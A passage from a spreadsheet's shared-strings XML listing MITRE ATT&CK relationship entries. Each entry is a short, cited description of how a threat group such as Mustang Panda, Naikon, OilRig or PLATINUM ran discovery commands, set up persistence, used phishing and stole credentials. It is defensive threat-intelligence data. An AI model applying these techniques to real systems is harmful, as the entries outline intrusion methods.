    <t>relationship--c592bcf5-6e88-4d77-a274-0a58b7388e76</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute a malicious Beacon stager.(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>relationship--42440c0c-f28b-4c42-94af-dc4cad6a8dd7</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</si>
  <si>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</si>
  <si>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relationship--c890e6af-c827-4369-a0f7-fb351c6b6ec5</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</si>
  <si>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</si>
  <si>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relationship--e122c13d-078d-4404-b2a0-e0e2341dbd2e</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has sent malicious links including links directing victims to a Google Drive folder.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: McAfee Dianxun March 2021)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--218a923b-2909-4186-8cf7-8fbfed6f2aaf</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</si>
  <si>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</si>
  <si>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relationship--efe1cabd-63cf-46d6-8010-93504832bc03</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--36838da3-5543-4998-b125-0a50d31d288e</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</si>
  <si>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</si>
  <si>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relationship--b6da41e9-9925-4b83-b9a7-d29509b852de</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</si>
  <si>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</si>
  <si>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relationship--bf78e7f6-2dc5-4b1b-95bb-03e8e5e0e5a1</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used malicious PowerShell scripts to enable execution.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>relationship--d37fac03-0b94-4794-b51a-e7db3d64294b</t>
  </si>
  <si>
    <t xml:space="preserve">[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;tasklist /v&lt;/code&gt; to determine active process information.(Citation: Avira Mustang Panda January 2020)	</t>
  </si>
  <si>
    <t>relationship--881641a8-77d9-4dce-9d4b-2388c9b11612</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has created the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU&lt;/code&gt; to maintain persistence.(Citation: Proofpoint TA416 November 2020)</t>
  </si>
  <si>
    <t>relationship--c0561e30-556b-486b-a7fa-1be6feece584</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has installed TeamViewer on targeted systems.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--3d32be2c-02cd-4210-879a-429ca9d21f99</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could spread through USB connections.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--65df5b73-98b5-474d-8ee4-0b60b7291712</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</si>
  <si>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</si>
  <si>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relationship--300fe039-5361-41e2-857f-5a8a311824d9</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the victim system for the &lt;code&gt;InstallUtil.exe&lt;/code&gt; program and its version.(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>relationship--ac2b9eab-5d0e-4ab5-9b5b-eebd454737d6</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used spearphishing attachments to deliver initial access payloads.(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>relationship--9d239fc5-5d40-4991-ae41-761686ab43a2</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered malicious links to their intended targets.(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>relationship--529e6ba3-a73d-4cca-84e9-d2d047340aa0</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered web bugs to profile their intended targets.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--33ee917f-8624-4108-91fb-a87d576ac634</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used servers under their control to validate tracking pixels sent to phishing victims.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--97b55f86-908f-4de2-ba9a-d65005b0f4dc</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted C2 communications with RC4.(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>relationship--1ca66056-792e-4e19-8742-a782d87806e4</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has gathered system information using &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--88221b55-8e8a-4a38-b477-a45907083011</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt; to determine network configuration information.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--036e996f-5767-4306-9dfa-7c22e797aecc</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;netstat -ano&lt;/code&gt; to determine network connection information.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--2cc2c5ca-7c7a-4ab7-9cb3-76bdd14324b8</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has hosted malicious payloads on DropBox including [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--165b8698-8d09-4602-9385-c5002c3eb46e</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</si>
  <si>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</si>
  <si>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relationship--2d352952-c19d-4e1d-8d23-1001f69b74d0</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</si>
  <si>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</si>
  <si>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relationship--4c6c38bb-8bb5-48d9-b4f3-54adfca1f902</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used DropBox URLs to deliver variants of [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--eac3f09f-fdd0-4bbd-965b-4e22276f4021</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed HTA files via cmd.exe, and used batch scripts for collection.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--672c21b6-0a54-4b70-8ce0-591cc5a72622</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed PowerShell scripts via WMI.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--1969fef1-3e75-4228-b034-b6436f207c01</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129)'s custom ORat tool uses a WMI event consumer to maintain persistence.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--b063f8cf-86d1-47fb-8ada-2b39009ee9e2</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--6f38eb77-da3f-4a35-b048-32a4fa6c6fbc</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used DLL side-loading to load malicious DLL's into legitimate executables.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--d4657411-8fa6-4bbc-9ed0-474eafd14375</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used administrator credentials for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--21298951-67d3-4904-97be-f7a57d120383</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has convinced victims to open malicious attachments to execute malware.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--d159e441-b30b-464a-8838-b83864173e89</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) renamed a malicious service &lt;code&gt;taskmgr&lt;/code&gt; to appear to be a legitimate version of Task Manager.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--887465a0-6818-4e79-b86d-b83d3a0f39eb</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has disguised malicious programs as Google Chrome, Adobe, and VMware executables.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--7148e604-1e3a-4a37-be3e-cde2fe20f9b6</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used the LadonGo scanner to scan target networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--592a2355-077e-4692-a28a-da998ed5f937</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has modified a victim's Windows Run registry to establish persistence.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--2a896410-d7cd-4b58-a7d6-4878bc64113b</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used a netbios scanner for remote machine identification.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--2794f341-b46f-482c-b5b7-2cc7c2dcadb5</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used schtasks.exe for lateral movement in compromised networks.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--8cce3864-0c29-4c3c-a1cd-733f792b8565</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh advfirewall firewall&lt;/code&gt; to discover local firewall settings.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--2e77d363-e38f-40ad-a6ef-9222dc12793d</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used malicious e-mail attachments to deliver malware.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>relationship--80fb05e9-68b8-4e3f-bc9a-2a5f828c397c</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) uses commands such as &lt;code&gt;netsh interface show&lt;/code&gt; to discover network interface settings.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--7138c1e4-6791-424b-adc1-5b4c7d5e3cca</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) has used WMIC.exe for lateral movement.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--597ca258-3af4-4e51-abf9-b192e98939fd</t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) executed PowerShell in a hidden window.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>relationship--c9076ac7-11d9-44fc-91dc-0f927d62497f</t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used malicious macros to download additional files to the victim's machine.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>relationship--b5ba9aa4-f2dd-4433-994b-bfe4c7c972fe</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) as attempted to lure victims into clicking on malicious attachments within spearphishing emails.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--9ef511b5-ecdb-4f11-97f6-0046ec25af84</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) attempted to make [Octopus](https://attack.mitre.org/software/S0340) appear as a  Telegram Messenger with a Russian interface.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--3cc1b62f-5059-4fb1-be06-72bb13498002</t>
  </si>
  <si>
    <t xml:space="preserve">[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used PowerShell for execution.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>relationship--fc9d110c-be6f-4976-90f9-1efde4a668e5</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has targeted victims with spearphishing emails containing malicious attachments.(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--9c7679e8-2be6-4cbb-a7f4-8583162366b3</t>
  </si>
  <si>
    <t>[Nomadic Octopus](https://attack.mitre.org/groups/G0133) used &lt;code&gt;cmd.exe /c&lt;/code&gt; within a malicious macro.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--35615dc6-1793-4d6a-b778-b3f0ab6e46dc</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) used the Plink utility and other tools to create tunnels to C2 servers.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--99686b3a-1ca4-4b36-ad4d-a8876d8c65ba</t>
  </si>
  <si>
    <t>21 March 2020</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used automated collection.(Citation: Unit42 OilRig Playbook 2023)</t>
  </si>
  <si>
    <t>relationship--a24299ed-9735-453c-bd13-66269b2d5d16</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used brute force techniques to obtain credentials.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--7f7226d7-6980-402a-b10e-e81b50c7ee09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</si>
  <si>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</si>
  <si>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relationship--cd95d72d-033c-4881-b233-70983106cbfa</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used various types of scripting for execution.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
    <t>relationship--e8ce10b4-3b00-40c1-983a-1d87ff9a68ee</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used a CHM payload to load and execute another malicious file once delivered to a victim.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--352e990d-48be-4d1a-bd8a-bc27d641aa1f</t>
  </si>
  <si>
    <t>relationship--d705df92-50a0-4810-a893-979f73c6cdc8</t>
  </si>
  <si>
    <t>relationship--c27b0834-d1b8-440f-9b35-e15e78ecd715</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</si>
  <si>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</si>
  <si>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relationship--dafc7834-fbb5-426c-adce-957742078002</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</si>
  <si>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</si>
  <si>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relationship--8dfb6f79-5a9a-4eb8-9b25-40d82ff0f668</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</si>
  <si>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</si>
  <si>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relationship--67469b79-67e2-4932-9776-b09a82871723</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</si>
  <si>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</si>
  <si>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relationship--5f5af879-c239-416b-99ec-b46e2f9926a2</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</si>
  <si>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</si>
  <si>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relationship--409581f2-270d-43ce-8044-34bc09874548</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has exfiltrated data over FTP separately from its primary C2 channel over DNS.(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>relationship--70495f42-0a81-485c-8f30-c75af61f1c6a</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) uses remote services such as VPN, Citrix, or OWA to persist in an environment.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--55e34506-746d-4895-928b-72c2e358161d</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.(Citation: OilRig ISMAgent July 2017)</t>
  </si>
  <si>
    <t>relationship--12daddcc-b964-485e-8c2d-10f554d78bcc</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has deleted files associated with their payload after execution.(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--51f1d23c-1ccd-4cc4-918c-39e9a66e510b</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.(Citation: Palo Alto OilRig April 2017)(Citation: Unit42 OilRig Nov 2018)</t>
  </si>
  <si>
    <t>relationship--fb6ffb5c-5405-4515-a120-7a34414933ea</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) can download remote files onto victims.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--8e9f95f0-4939-4e74-9073-70efddddff50</t>
  </si>
  <si>
    <t xml:space="preserve">[OilRig](https://attack.mitre.org/groups/G0049) has used keylogging tools called KEYPUNCH and LONGWATCH.(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)	
</t>
  </si>
  <si>
    <t>relationship--a8d7e4da-53d8-45c2-8c87-70424d96a949</t>
  </si>
  <si>
    <t>relationship--65b58e05-916b-4840-b0a0-bb7fd8dc3f32</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</si>
  <si>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</si>
  <si>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relationship--0fa0f5d6-be0b-4a48-938c-6d9bb8b1a170</t>
  </si>
  <si>
    <t>relationship--39ce32d3-7721-4008-b74d-3549b7bb8fa7</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;net localgroup administrators&lt;/code&gt; to find local administrators on compromised systems.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--d39e3775-9221-4020-b826-edc111e36c7c</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</si>
  <si>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</si>
  <si>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relationship--557d3feb-0699-429e-bc83-ff114cf138ef</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has delivered malicious links to achieve execution on the target system.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>relationship--952edf61-e906-4ab5-989f-1d6a5dd95dce</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used .doc file extensions to mask malicious executables.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--2ffc25c4-3939-40df-841c-91059c6879d4</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--393a3ec4-9970-44ab-ae63-1e9c6bed0310</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</si>
  <si>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</si>
  <si>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relationship--cdbfa147-52be-411d-bcbd-f6dcbf91d7b5</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</si>
  <si>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</si>
  <si>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relationship--3c367277-6168-4df8-b982-e9949994123d</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used net.exe in a script with &lt;code&gt;net accounts /domain&lt;/code&gt; to find the password policy of a domain.(Citation: FireEye Targeted Attacks Middle East Banks)</t>
  </si>
  <si>
    <t>relationship--5e39caf2-083b-4e4c-b04f-d83c512341cb</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used tools to identify if a mouse is connected to a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--8dd1ec07-e429-473d-84db-125fd22ab709</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</si>
  <si>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</si>
  <si>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relationship--4fde23ab-b8db-4275-ac37-37e608cb00b0</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;tasklist&lt;/code&gt; on a victim's machine.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--d8e375a3-f455-4c66-bc63-251f320ec8b1</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used the Plink utility and other tools to create tunnels to C2 servers.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>relationship--b6c44630-d1d0-467c-a84d-83564a3a0639</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”&lt;/code&gt; on a victim to query the Registry.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--e30c24d3-d440-4395-88b3-3192a02c4364</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</si>
  <si>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</si>
  <si>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relationship--27ead6bc-2bba-49d3-bcfe-667c7654a6fc</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used Putty to access compromised systems.(Citation: Unit42 OilRig Playbook 2023)</t>
  </si>
  <si>
    <t>relationship--bd83109f-198a-43b0-a4c9-c13dd671c2da</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has created scheduled tasks that run a VBScript to execute a payload on victim machines.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--a1e16836-d6d9-4d47-bb9a-35f31f369980</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has a tool called CANDYKING to capture a screenshot of user's desktop.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--45cd89d8-68fd-42a2-94ba-7796a696bc47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</si>
  <si>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</si>
  <si>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relationship--a025d011-6e46-4d3a-a9f7-31324027b7cf</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has sent spearphising emails with malicious links to potential victims.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--8272bde7-817f-4cb4-b073-67859002d310</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>relationship--b3d6abc5-11da-4d0c-a699-8cafac03dfab</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used macros to verify if a mouse is connected to a compromised machine.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--eacf7d8c-c60c-4d4b-af28-57c015a54c55</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</si>
  <si>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</si>
  <si>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relationship--0c03f2b4-a752-4d74-9c26-5306132a3329</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>relationship--e0301b36-c339-49c5-b257-9ece19152922</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;netstat -an&lt;/code&gt; on a victim to get a listing of network connections.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--8edb0383-cae8-43ee-9241-b25e5068cc95</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--b22cebe6-129a-41a2-8a9e-70c222c88af6</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;sc query&lt;/code&gt; on a victim to gather information about services.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--4923be5e-dd24-4289-adca-e9dbf545b9c2</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used compromised credentials to access other systems on a victim network.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--9779ccbc-c376-4a6e-a43f-56a782892302</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used VBSscipt macros for execution on compromised hosts.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--7f80cb84-3cb5-4de3-a484-1c0a60e2dbcf</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used HTTP for C2.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>relationship--166326b3-6864-4667-aee9-4d7b24cc75d8</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used web shells, often to maintain access to a victim network.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--2dbed740-1b50-4d59-a729-a1d9e6a839df</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</si>
  <si>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</si>
  <si>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relationship--26cee727-2047-4ea9-b3bd-1115431aa633</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.(Citation: FireEye APT34 July 2019)</t>
  </si>
  <si>
    <t>relationship--024593ae-03a1-4ffa-a5fc-fc2fe43e6ebf</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) has used WMI for execution.(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--bd0cff5e-762e-4ba0-ab42-9bfe84e8db4f</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--e09c37a3-ae23-403e-93d5-aef4953bd43c</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) has used HTTP for C2.(Citation: Symantec Orangeworm IOCs April 2018)</t>
  </si>
  <si>
    <t>relationship--1d90aad5-e0fb-4a8c-862a-71d3db99bae9</t>
  </si>
  <si>
    <t>26 October 2021</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) is capable of using Windows hook interfaces for information gathering such as credential access.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4ebc7501-9471-4f37-92e1-8711073bd062</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has sometimes used drive-by attacks against vulnerable browser plugins.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--0583724d-7778-42ed-995c-acad526db4ba</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has leveraged a zero-day vulnerability to escalate privileges.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--3d4737ca-bd18-4628-b453-9aed3f555c13</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.(Citation: Microsoft PLATINUM June 2017)</t>
  </si>
  <si>
    <t>relationship--1255a34c-e280-4b16-b606-7b03682cd76d</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used several different keyloggers.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--8ba987a9-3a03-4996-8fb7-80f34a35f406</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used keyloggers that are also capable of dumping credentials.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--a14c4d34-5a27-419a-b665-e1207ba55ca7</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--3350f278-af37-4183-b1be-8d79abce27ac</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has renamed rar.exe to avoid detection.(Citation: Twitter ItsReallyNick Platinum Masquerade)</t>
  </si>
  <si>
    <t>relationship--f3b19f07-d8a9-4aca-a649-039024997a4f</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) has used the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.(Citation: Microsoft PLATINUM June 2017)</t>
  </si>
  <si>
    <t>relationship--c83da269-9c77-4941-bf69-8e79bdfa5edf</t>
  </si>
  <si>
